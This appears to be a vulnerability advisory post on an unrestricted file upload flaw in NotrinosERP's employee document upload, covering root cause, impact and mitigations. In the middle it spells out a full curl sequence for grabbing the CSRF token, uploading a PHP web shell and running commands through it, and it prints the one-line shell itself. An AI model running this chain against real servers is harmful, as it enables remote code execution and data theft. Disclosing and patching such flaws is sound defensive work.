Listen to this Post
How GHSA-qv4m-m73m-8hj7 Works
This vulnerability resides in the HRM module of NotrinosERP, specifically within the employee document upload functionality. An authenticated user possessing the `SA_EMPLOYEE` (Manage Employees) permission can exploit an arbitrary file upload flaw to achieve remote code execution on the underlying server.
The core issue lies in the `tab_documents()` function within /hrm/manage/employees.php. When a user uploads a document through the employee “Documents” tab, the application constructs the final file path using the client-supplied filename without any sanitization or validation:
$file_path = $upload_dir.'/'.$employee_id.'<em>'.time().'</em>'.$_FILES['doc_file']['name'];
This stands in stark contrast to other parts of the application, such as the profile photo upload which validates file types, and the core `includes/ui/attachment.inc` which correctly uses a server-generated, extension-less name (uniqid()) to avoid trusting user input.
The uploaded files are written to a web-accessible directory, as `company_path()` resolves under the web root (e.g., /company/0/documents/employees/). The project’s root `.htaccess` file only blocks a few specific extensions like .inc, .po, and .sh, but critically, it does not block `.php` files and does not cover the `company/` directory.
An attacker can therefore upload a malicious PHP file (e.g., shell.php). The application then echoes the unescaped file path into a clickable “View” link, providing the attacker with the exact URL to access and execute their uploaded shell. This straightforward chain of events—unrestricted upload, predictable web-accessible path, and lack of execution blocking—leads directly to remote code execution. Furthermore, a crafted filename containing `../` can enable path traversal on some PHP configurations.
DailyCVE Form
| Field | Value |
| : | : |
| Platform | NotrinosERP |
| Version | <= 1.0.0 |
| Vulnerability | Unrestricted File Upload |
| Severity | High |
| Date | 2026-07-10 |
| Prediction | No known fix |
What Undercode Say: Analytics
The vulnerability is triggered via a standard authenticated HTTP POST request. The following `curl` command demonstrates how an attacker can upload a web shell:
1. First, obtain the CSRF token from the document upload page. This step is crucial as the /hrm/manage/employees.php endpoint validates the <em>token. curl -s -c cookies.txt 'http://<target>/hrm/manage/employees.php?employee_no=1&_tabs_sel=tab_documents' | grep -oP 'name="_token" value="\K[^"]+' > token.txt 2. Use the obtained token to upload a malicious PHP file. curl -X POST 'http://<target>/hrm/manage/employees.php?employee_no=1&_tabs_sel=tab_documents' \ -H 'Cookie: <authenticated_session_cookie>' \ -F "_token=$(cat token.txt)" \ -F "doc_type_id=1" \ -F "doc_name=x" \ -F "[email protected]" \ -F "save_document=Save Document" 3. The server responds with a link to the uploaded file. An attacker can then execute commands. The path format is: /company/0/documents/employees/{employee_id}</em>{timestamp}_{filename} curl 'http://<target>/company/0/documents/employees/1_1734567890_shell.php?c=id'
The code above shows the complete attack flow: fetching the CSRF token, uploading the file, and executing a system command (id) through the web shell.
How Exploit: Remote Code Execution
An attacker with the `SA_EMPLOYEE` permission can exploit this flaw with the following steps:
1. Authentication & CSRF Bypass: The attacker authenticates and retrieves the required CSRF token (_token) from the document upload form.
2. Crafting the Payload: A malicious PHP file (e.g., shell.php) is created. A simple example is <?php system($_GET['c']); ?>.
3. Uploading the Shell: The attacker submits a `multipart/form-data` POST request to `/hrm/manage/employees.php` with the `doc_file` set to the malicious file. No validation is performed on the file’s name, type, or content.
4. Accessing the Shell: The application stores the file in the web root and provides the URL via a “View” link. The attacker accesses this URL, appending a system command as a parameter (e.g., ?c=whoami). The PHP code executes on the server, granting the attacker remote code execution.
Protection: Mitigation Strategies
To protect against this vulnerability, the following measures should be implemented immediately:
Server-Generated Filenames: Never use the client-supplied filename for storage on disk. Adopt the pattern used in `includes/ui/attachment.inc` and generate a random, extension-less name using uniqid().
Strict Validation: Implement an allow-list for permitted document extensions and MIME types, similar to the validation performed on the profile photo (pic) upload. Enforce a file size limit.
Disable Script Execution: Place an `.htaccess` or `web.config` file inside the `company//documents/` directory to disable PHP script execution (e.g., php_admin_flag engine off, RemoveHandler .php).
Output Encoding: Ensure the stored file path is properly escaped with `htmlspecialchars()` before being output in the “View” link to prevent the secondary stored XSS vulnerability.
Impact
Successful exploitation allows an authenticated user (who is not necessarily an administrator) to execute arbitrary system commands on the hosting server. This can lead to complete compromise of the server, including data theft, malware installation, and lateral movement within the network. The severity is estimated at CVSS 7.2 (High).
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

